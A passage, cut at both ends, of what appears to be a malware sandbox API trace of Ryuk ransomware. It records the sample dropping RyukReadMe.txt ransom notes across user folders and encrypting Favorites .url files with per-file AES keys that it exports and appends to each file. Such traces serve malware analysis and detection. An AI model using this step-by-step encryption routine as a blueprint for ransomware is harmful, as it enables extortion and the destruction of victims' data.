halpmcxz\\documents\\zx6d\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.064] GetLastError () returned 0x0 [0156.064] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0156.065] CloseHandle (hObject=0x188) returned 1 [0156.065] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0156.065] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0156.065] SetLastError (dwErrCode=0x0) [0156.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.066] GetLastError () returned 0xb7 [0156.066] CloseHandle (hObject=0x184) returned 1 [0156.066] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0156.066] SetLastError (dwErrCode=0x0) [0156.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.066] GetLastError () returned 0xb7 [0156.066] CloseHandle (hObject=0x184) returned 1 [0156.066] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0156.066] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.066] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.066] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0156.066] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0156.066] SetLastError (dwErrCode=0x0) [0156.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.067] GetLastError () returned 0x0 [0156.067] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0156.067] CloseHandle (hObject=0x184) returned 1 [0156.068] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0156.068] SetLastError (dwErrCode=0x0) [0156.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0156.068] GetLastError () returned 0xb7 [0156.068] CloseHandle (hObject=0x184) returned 1 [0156.068] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0156.068] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.068] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.068] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.068] SetLastError (dwErrCode=0x0) [0156.068] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.068] GetLastError () returned 0x0 [0156.068] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0156.069] CloseHandle (hObject=0x188) returned 1 [0156.069] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0156.069] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.069] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.069] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.069] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.070] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", dwFileAttributes=0x80) returned 1 [0156.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.070] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=236) returned 1 [0156.070] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=236) returned 1 [0156.070] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.070] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.070] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.070] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xec, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xec, lpOverlapped=0x0) returned 1 [0156.071] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.071] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xec, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf0) returned 1 [0156.071] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.072] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf0, lpOverlapped=0x0) returned 1 [0156.072] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.072] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.072] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.072] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.072] CloseHandle (hObject=0x18c) returned 1 [0156.089] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.094] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.094] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.095] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.095] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.095] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x80) returned 1 [0156.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.095] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=226) returned 1 [0156.096] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=226) returned 1 [0156.096] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.096] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.096] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.096] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xe2, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xe2, lpOverlapped=0x0) returned 1 [0156.097] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.097] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xe2, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf0) returned 1 [0156.097] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.097] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf0, lpOverlapped=0x0) returned 1 [0156.097] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.097] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.097] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.097] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.097] CloseHandle (hObject=0x18c) returned 1 [0156.115] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.120] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.120] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.120] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0156.120] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0156.120] SetLastError (dwErrCode=0x0) [0156.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.486] GetLastError () returned 0x0 [0156.486] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0156.487] CloseHandle (hObject=0x188) returned 1 [0156.487] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0156.487] SetLastError (dwErrCode=0x0) [0156.487] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0156.487] GetLastError () returned 0xb7 [0156.487] CloseHandle (hObject=0x188) returned 1 [0156.487] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0156.489] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.489] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.489] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.489] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x80) returned 1 [0156.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.490] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.490] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.490] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.490] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.490] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.490] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.491] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.491] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.491] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.491] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.491] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.491] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.491] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.491] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.491] CloseHandle (hObject=0x18c) returned 1 [0156.508] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.513] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.513] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.513] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.513] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.513] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x80) returned 1 [0156.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.514] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.514] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.514] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.514] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.514] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.514] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.515] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.515] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.515] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.515] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.515] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.515] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.515] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.516] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0156.516] CloseHandle (hObject=0x18c) returned 1 [0156.534] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.539] CryptDestroyKey (hKey=0x3b8690) returned 1 [0156.539] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0156.539] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0156.539] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0156.539] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url", dwFileAttributes=0x80) returned 1 [0156.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0156.540] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=133) returned 1 [0156.540] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=133) returned 1 [0156.540] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0156.540] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0156.540] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.540] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x85, lpOverlapped=0x0) returned 1 [0156.541] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0156.541] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x85, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x90) returned 1 [0156.541] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0156.541] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x90, lpOverlapped=0x0) returned 1 [0156.541] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0156.542] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.542] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0156.542] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, 